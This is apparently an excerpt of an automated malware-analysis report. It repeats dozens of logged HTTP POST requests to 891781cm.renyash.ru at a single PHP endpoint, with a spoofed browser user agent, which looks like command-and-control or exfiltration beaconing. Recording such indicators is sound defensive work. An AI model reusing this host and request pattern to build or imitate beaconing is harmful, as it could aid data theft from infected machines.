                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
